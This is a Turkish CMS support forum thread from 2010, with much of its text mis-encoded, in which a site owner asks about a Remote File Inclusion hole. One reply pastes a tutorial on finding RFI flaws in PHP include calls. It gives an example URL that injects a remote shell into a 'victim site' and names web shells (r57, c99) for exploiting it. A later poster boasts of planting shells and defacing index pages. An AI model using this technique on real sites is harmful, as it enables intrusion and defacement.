|
»Forumlar »?neri & Ele?tirileriniz
»Sitemde açık varr
https://seditio.com.tr/eski1/forums.php?m=posts&q=1148 |
| Author: world, Posted: 2010-12-23 08:13 GMT. |
| Benim sitemde rfi a???? var ama a????n nas?l oldu?unu bilmiyom o y?zden kapatam?yom yard??m |
| Author: ers0be, Posted: 2010-12-23 12:26 GMT. |
|
standart rfi a??klar? bulma y?ntemleri -------------------------------------------------------------------------------- RFI a??l?m? olarak Remote File Inclusion'dur yani t?rk?e kar??l??? olarak Uzaktan Dosya Enjekte etmektir ama biz buna hacking aleminde daha ?ok Uzaktan Kod ?a??rma diyoruz.. Mant???na gelince de; PHP Coderlar?n sayfalar? kodlarken kulland?klar? string (yumak) ve variable (de?i?ken) lerin tam olarak kontrol edilmemesinden dolay? her zaman war olan ve war olmaya devam edecek olan bir g?venlik a????d?r. Neden b?yle s?yleyebiliyorum? ??nk? 2-3 g?n boyunca bir an bile durmaks?z?n kodlama yapan bir coder elinde sonunda bir yerde gerek yorgunluktan gerekse dikkatsizlikten dolay? kodlarda a??k werecektir. Neyse laf? fazla doland?rmadan ?rnek vereyim.. Hepimizin bildi?i ve bu sitede de kullan?lan vBulletin script'ini ele alal?m. ( art? parantez vBulletin'in pop?ler versiyonlar? olan 3.6.x serisinde bugune kadar rfi a???? bulundu?unu duymad?m bilmiyorum. Sadece ?rnek olsun diye bu scripti ele ald?m. ) Nas? bulunur? Kullan?m? nas? olur? A??k tespit etmek i?in ?ncelikle PHP den orta seviye de anlamam?z gerekiyor. ?imdi ad?m ad?m a??k bulmay? anlatay?m.. ?ncelikle a??k bulmak istedi?iniz scriptin kaynak kodlar?n? bilgisayar?n?za download ediyorsunuz. Bu ?rnekte biz vBulletin scriptini indiriyoruz. ve ara?t?rmaya ba?l?yoruz. Mesela " index.php " dosyas?n? ara?t?rmak istiyoruz.. O zaman index.php dosyas?n? bir text edit?r? yard?m? ile a??yoruz ?rn?in Not Defteri.. ve hemen kodlar? incelemeye ba?l?yoruz.. Ara?t?rma kriterlerimiz; include include_once require require_once fonksiyonlar?d?r. Hatta bir iyilik daha yapay?m ve bu fonksiyonlar?n PHP ne i?e yarad???n? anlatay?m.. Daha etkili olur.. ?imdi bildi?iniz ?zere web-sitelerinde dola?t???n?z her sayfa tek tek s?f?rdan yap?l?r.. ?zellikle HTML site kodland??? zaman her sayfa i?in ayn? kodlar? tekrar tekrar girmek zorunda kal?rs?n?z ama PHP bu y?n?yle ve di?er y?nleriylede HTML den olduk?a ?st?nd?r ve include ve require fonksiyonlar? sayesinde sabit bir sayfay? farkl? ama?larda kullanabiliriz. yani anlatmak istedi?im ?ey mesela bir in?aat ?irketinin sitesini PHP olarak kodluyosunuz ve header dedi?imiz yukar?da yani banner ve ?evresini kapsayan k?s?m anasayfadan tutunda kontak sayfas?na kadar heryerde ayn? de?i?en tek ?ey sadece ortada bulunan yaz?lar?n bulundugu yer.. ?imdi anasayfa ve kontak sayfas? i?in tek tek kodlama yapmaktansa ust.php diye bir kere kodlar?z ve anasayfa.php ye a?a??daki kodu ekleriz; <? include_once ($orchid, "ust.php") ?> daha sonra ayasayfa.php dosyas?n? ?al??t?rd???m?z zaman ust.php nin anasayfa ile b?t?nle?erek ??kt???n? g?r?rs?n?z ve bu kodu her sayfan?z i?in yazarsan?z otomatikmen kolay bi ?ekilde ust.php dosyas?n? istedi?iniz yere ENJEKTE edebilirsiniz.. " Dikkat : ENJEKTE " ?imdi include ve require fonksiyonlar?n?n mant???n? anlad???n?z? varsa***** kald???m?z yere geri d?nelim.. index.php dosyas?n? a?t?n?z ve include, include_once, vb. gibi bir kod g?rd?n?z.. Az ?nceki ?rne?e devam edelim; <? include_once ($orchid, "ust.php") ?> Yukar?da g?rd???n?z PHP kodu bulundugu sayfaya ayn? dizinde bulundugu ust.php dosyas?n? ?a??rmaktad?r. (Dikkat : ?A?IRMAKTADIR ) ?imdi biz ne yapabiliriz bu koda? Hemen d???n?r?zki acaba coder " DOSYA ?A?IRMA " i?levini s?n?rland?rm??m?d?r yani sadece bulundu?u dizinden mi dosya kabul ediyor?? Hemen bi deneme yapar?z.; index.php dosyas?ndayd?k ve " orchid " parametresini kullanarak ust.php dosyas?n? ?a??ran yukar?da ki kodda a??k ar?yoduk, deneme - yan?lma yapal?m.. kurbansite.com/index.php?orchid=http://SHELL? Ve girdik.. ?imdi az ?nce UST.PHP nin bulundugu yerde bizim shellimiz war.. B?ylece ilk ad?m? att?k ve a????m?z? bulduk bundan sonra art?k r57, c99, fatalshell, ekin0xshell ne kullan?rsan?z kullan?p buldu?unuz a???? s?m?r?n (exploit = S?m?rmek) al?nt?... |
| Author: world, Posted: 2010-12-23 18:57 GMT. |
|
birader pek anlamad?m be kaan gelsin bi baks?n yaa |
| Author: Kaan, Posted: 2010-12-24 00:44 GMT. |
|
A??k oldugunu nereden anlad?n.? neler yapabiliyorlar a??kla daha ayd?nlat?c? anlat?rsan ona g?re gerekli d?zenlemeyi yapar?z. HP Coderlar?n sayfalar? kodlarken kulland?klar? string (yumak) ve variable (de?i?ken) lerin tam olarak kontrol edilmemesinden dolay? her zaman war olan ve war olmaya devam edecek olan bir g?venlik a????d?r. Neden b?yle s?yleyebiliyorum? ??nk? 2-3 g?n boyunca bir an bile durmaks?z?n kodlama yapan bir coder elinde sonunda bir yerde gerek yorgunluktan gerekse dikkatsizlikten dolay? kodlarda a??k werecektir. Bende bu konuyu incelerken fark ettim ki yeni haz?rlad?g?m sistemde ?ok b?y?k bir a??k b?rakm???m son anda fark ettim ve gerekli uygulamay? yapt?m yoksa hepimiz yanm??t?k fark etselerdi ![]() |
| Author: JoviaL, Posted: 2010-12-24 07:42 GMT. |
| world free host larda shell cal?sm?z ben?m b?ld?g?m : ) |
| Author: rootinq, Posted: 2010-12-24 15:00 GMT. |
|
rfi olmasi imkansiz seditio da |
| Author: world, Posted: 2010-12-24 15:05 GMT. |
| Madrox rahatca shell at?yo |
| Author: Aragorn-pc, Posted: 2010-12-24 15:53 GMT. |
Alıntı Niye imkans?z olsun ki ? Daha ?nce bir ?ok rfi a???? ile ruslar ter?r estirdi |
| Author: rootinq, Posted: 2010-12-24 19:08 GMT. |
|
bana bitane rfi acigi olan sayfayi gostersene ?. birseyi soylerken iskembeyi k?bradan sallam?yorum |
| Author: By_Reco, Posted: 2010-12-24 19:10 GMT. |
| aga sorununu anlad?m ben sorunu ??zmek i?in config.php yi ?ifrele |
| Author: Kaan, Posted: 2010-12-24 20:48 GMT. |
|
Bende test ettim suanda seditioda bir a??k g?r?nm?yor. Extra eklenen kodlardan veya ba?ka bir eklentiden kaynaklanabilir. Ba?ka sitelerden indirdi?iniz eklentileri vb.?zellikleri sisteminize entegre etmeyiniz. Bu site sizin i?in var ve sizin isteklerinize g?re gerekli eklentileri ve modifiyeleri veriyoruz zaten bu siteden indirdi?iniz eklentide veya kodlarda a??k bulunursa derhal bildiriniz. Her zaman s?ylemi?imdir ve s?yleme devam ediyorum. En b?y?k a??k site sahibidir. Yapt?g? hatalardan dolay? siteleri bu t?r sald?r?lara maruz kalmaktad?r. |
| Author: world, Posted: 2010-12-25 12:50 GMT. |
| oke ozaman config.php yi nas? ?ifreleniyo onu g?sterirmisin |
| Author: JoviaL, Posted: 2010-12-25 13:20 GMT. |
| world kulland?g?n s?stem ?n surumu ned?r ? 130 dan eski ise 130 a gec 130 da c?dd? b? ac?k yok ugrasma bosu bosuna |
| Author: world, Posted: 2010-12-25 15:19 GMT. |
| gerek yok art?k 151 kullan?cam |
| Author: rootinq, Posted: 2010-12-25 18:59 GMT. |
|
ben 121 kulaniyorum |
| Author: Kaan, Posted: 2010-12-25 19:23 GMT. |
Alıntı Scripti de?i?tirmen senin zarar?na gerekli g?ncellemeleri yapmakda zorluk ?ekersin. Seditioda a??k yok ?uan i?in belki vard?r bizim bilmedi?imiz ama uzun zamand?r ?nemli bir a???a rastlanmad?. Madem o i?lerle u?ras?yorsunuz indirin test edin Scripti i?de burada a??k var diye bag?rman?n bir anlam? yok Scripti defalarca test edin bir a??k bulursan?z s?yleyin herkes bilsin. |
| Author: By_Reco, Posted: 2010-12-25 21:37 GMT. |
| aga seditio 151 kur a??klar gider fakat hayla ayn? system de kalmak istiyorsan config.php ?ifrelemenin yolunu bul sitene shell soksa bile hackliyemez beni dinle sen |
| Author: vanli, Posted: 2010-12-28 00:32 GMT. This post was edited by Kaan (2010-12-28 00:59 GMT, 5720 Gün ago) |
|
config.php yi ?ifrelicek ve shellde soksa hacklenmicek ben ?ahsen bi sisteme shell soktugumda eger yazma izinleri yoksa (ki her t?rl? server? ge?erim **** ) Server? Ge?meye ?al???r?m Ve Ge?er ?ndex.php ye indexsi **** yani shell sokupta aman ?unun config.php sini al?y?mda sitede admin ?yeligine girimde meta atay?m demem. |
| Author: Kaan, Posted: 2010-12-28 01:00 GMT. |
Konuyu ba?ka yerlere ?ekti?iniz i?in konu kapanm??t?r bu t?r konular?n yeri buras? de?il olmayacakt?rda bu t?r diyaloglara girenler siteden uzakla?t?r?l?caklard?r. |
| Powered by Seditio | Print version |